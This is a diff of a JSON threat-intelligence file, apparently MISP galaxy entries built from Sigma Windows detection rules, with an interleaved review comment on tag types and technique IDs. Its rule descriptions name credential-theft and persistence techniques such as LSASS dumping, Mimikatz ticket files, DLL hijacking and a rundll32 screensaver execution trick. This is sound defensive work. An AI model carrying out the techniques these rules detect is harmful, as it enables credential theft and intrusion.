+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2",
+ "value": "GoToAssist Temporary Installation Artefact"
+ },
+ {
+ "description": "Detects a Windows executable that writes files to suspicious folders",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/11/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_shell_write_susp_directory.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43",
+ "value": "Windows Shell File Write to Suspicious Folder"
 },
 {
 "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n",
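Review bot: The `tags` field changes type in the last entry added by this hunk — every other entry carries an array of strings, but "Windows Shell File Write to Suspicious Folder" gets the bare string `"tags": "No established tags"`, so a consumer that iterates or matches on `meta.tags` will break on this element; the fourth hunk adds the same string for "WScript or CScript Dropper - File". An empty array `"tags": []` (or omitting the key) keeps the field's type stable, and since these entries appear to be generated from the upstream rule set, the generator is the place to fix it rather than the cluster file. Separately, the "Creation Exe for Service with Unquoted Path" entry is tagged `attack.t1547.009` while its own reference points at `atomics/T1574.009`; unquoted-path interception is T1574.009, so this looks like a transposed technique id worth checking against the upstream rule before it is propagated into galaxy lookups. The `creation_date` values use `YYYY/MM/DD` rather than ISO 8601 `YYYY-MM-DD`; acceptable if that is the galaxy's established convention, but it should be consistent across the file.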
@@ -22609,415 +24569,6 @@ "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", "value": "Powerup Write Hijack DLL" }, - { - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_dll_sideloading_space_path.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", - "value": "DLL Search Order Hijackig Via Additional Space in Path" - }, - { - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_error_handler_cmd_persistence.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "15904280-565c-4b73-9303-3291f964e7f9", - "value": "Persistence Via ErrorHandler.Cmd" - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "meta": { - "author": "Florian Roth (rule), MSTI (query, idea)", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_exchange_webshell_drop.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "value": "Suspicious ASPX File Drop by Exchange" - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "meta": { - 
"author": "Florian Roth", - "creation_date": "2022/10/04", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ] - }, - "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "value": "Suspicious File Drop by Exchange" - }, - { - "description": "Detects default lsass dump filename from SafetyKatz", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/07/24", - "falsepositive": [ - "Rare legitimate files with similar filename structure" - ], - "filename": "file_event_win_ghostpack_safetykatz.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", - "value": "SafetyKatz Default Dump Filename" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, 
such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_gotoopener_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", - "value": "GoToAssist Temporary Installation Artefact" - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/04", - "falsepositive": [ - "Very unlikely" - ], - "filename": "file_event_win_hack_dumpert.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", 
- "value": "Dumpert Process Dumper Default File" - }, - { - "description": "Detects files written by the different tools that exploit HiveNightmare", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/23", - "falsepositive": [ - "Files that accidentally contain these strings" - ], - "filename": "file_event_win_hivenightmare_file_exports.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" - ] - }, - "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "value": "Typical HiveNightmare SAM File Export" - }, - { - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_hktl_nppspy.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", - "https://twitter.com/0gtweet/status/1465282548494487554", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "value": "NPPSpy Hacktool Usage" - }, - { - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such 
as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", - "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" - ] - }, - "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", - "value": "Potential Initial Access via DLL Search Order Hijacking" - }, - { - "description": "TeamViewer_Desktop.exe is create during install", - "meta": { - "author": "frack113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_install_teamviewer_desktop.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "value": "Installation of TeamViewer Desktop" - }, - { - "description": "Detects the 
presence and execution of Inveigh via dropped artefacts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_inveigh_artefacts.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", - "value": "Inveigh Execution Artefacts" - }, - { - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "meta": { - "author": "frack113", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", - "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" - }, - { - "description": "Detects the creation of a ISO file in the Outlook 
temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "meta": { - "author": "@sam0x90", - "creation_date": "2022/07/30", - "falsepositive": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" - ], - "filename": "file_event_win_iso_file_mount.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", - "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "value": "ISO File Created Within Temp Folders" - }, - { - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Cases in which a user mounts an image file for legitimate reasons" - ], - "filename": "file_event_win_iso_file_recent.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" - ], - "tags": "No established tags" - }, - "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "value": "ISO or Image Mount Indicator in Recent Files" - }, - { - "description": "Detects programs on a Windows system that should not write an archive to disk", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "value": "Legitimate Application Dropped Archive" - }, { "description": "Detects programs on a Windows system that should not write executables to disk", "meta": { 
@@ -23043,453 +24594,25 @@
 "value": "Legitimate Application Dropped Executable"
 },
 {
- "description": "Detects programs on a Windows system that should not write scripts to disk",
+ "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe",
 "meta": {
- "author": "frack113, Florian Roth",
- "creation_date": "2022/08/21",
+ "author": "Tim Shelton",
+ "creation_date": "2022/01/10",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "file_event_win_legitimate_app_dropping_script.yml",
+ "filename": "file_event_win_cscript_wscript_dropper.yml",
 "level": "high",
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml"
+ "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml"
 ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ]
+ "tags": "No established tags"
 },
- "uuid": "7d604714-e071-49ff-8726-edeb95a70679",
- "value": "Legitimate Application Dropped Script"
- },
- {
- "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_lsass_dump.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.google.com/search?q=procdump+lsass",
- "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
- "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
- "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
- "https://github.com/helpsystems/nanodump",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391",
- "value": "LSASS Process Memory Dump Files"
- },
- {
- "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified",
- "meta": {
- "author": "Teymur Kheirkhabarov, oscd.community",
- "creation_date": "2019/10/22",
- "falsepositive": [
- "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator",
- "Dumps of another process that contains lsass in its process name (substring)"
- ],
- "filename": "file_event_win_lsass_memory_dump_file_creation.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a",
- "value": "LSASS Memory Dump File Creation"
- },
- {
- "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_lsass_werfault_dump.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/helpsystems/nanodump",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182",
- "value": "WerFault LSASS Process Memory Dump"
- },
- {
- "description": "A office file with macro is created from a commandline or a script",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/23",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_macro_file.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
- "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "uuid": "b1c50487-1967-4315-a026-6491686d860e",
- "value": "Dump Office Macro Files from Commandline"
- },
- {
- "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
- "meta": {
- "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2017/11/10",
- "falsepositive": "No established falsepositives",
- "filename": "file_event_win_mal_adwind.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
- ]
- },
- "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1",
- "value": "Adwind RAT / JRAT File Artifact"
- },
- {
- "description": "Detects Octopus Scanner Malware.",
- "meta": {
- "author": "NVISO",
- "creation_date": "2020/06/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_mal_octopus_scanner.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml"
- ],
- "tags": [
- "attack.t1195",
- "attack.t1195.001"
- ]
- },
- "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9",
- "value": "Octopus Scanner Malware"
- },
- {
- "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls",
- "meta": {
- "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
- "creation_date": "2021/10/25",
- "falsepositive": [
- "Legitimate user creation"
- ],
- "filename": "file_event_win_mal_vhd_download.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
- "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ]
- },
- "uuid": "8468111a-ef07-4654-903b-b863a80bbc95",
- "value": "Suspicious VHD Image Download From Browser"
- },
- {
- "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/11/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_mimikatz_kirbi_file_creation.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://cobalt.io/blog/kerberoast-attack-techniques",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1558"
- ]
- },
- "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29",
- "value": "Mimikatz Kirbi File Creation"
- },
- {
- "description": "Detects Mimikatz MemSSP default log file creation",
- "meta": {
- "author": "David ANDRE",
- "creation_date": "2021/12/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_mimimaktz_memssp_log_file.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003"
- ]
- },
- "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66",
- "value": "Mimikatz MemSSP Default Log File Creation"
- },
- {
- "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_moriya_rootkit.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ]
- },
- "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88",
- "value": "Moriya Rootkit"
- },
- {
- "description": "Detects msdt.exe creating files in suspicious directories",
- "meta": {
- "author": "Vadim Varganov, Florian Roth",
- "creation_date": "2022/08/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_msdt_autorun.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001",
- "cve.2022.30190"
- ]
- },
- "uuid": "318557a5-150c-4c8d-b70e-a9910e199857",
- "value": "MSDT.exe Creates Files in Autorun Directory"
- },
- {
- "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/11/18",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "file_event_win_net_cli_artefact.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
- "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ]
- },
- "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c",
- "value": "NET CLR Binary Execution Usage Log Artifact"
- },
- {
- "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution"
- ]
- },
- "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04",
- "value": "Creation Suspicious File In Uncommon AppData Folder"
- },
- {
- "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver",
- "meta": {
- "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io",
- "creation_date": "2022/04/27",
- "falsepositive": [
- "The installation of new screen savers."
- ],
- "filename": "file_event_win_new_src_file.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Libraries/Desk/",
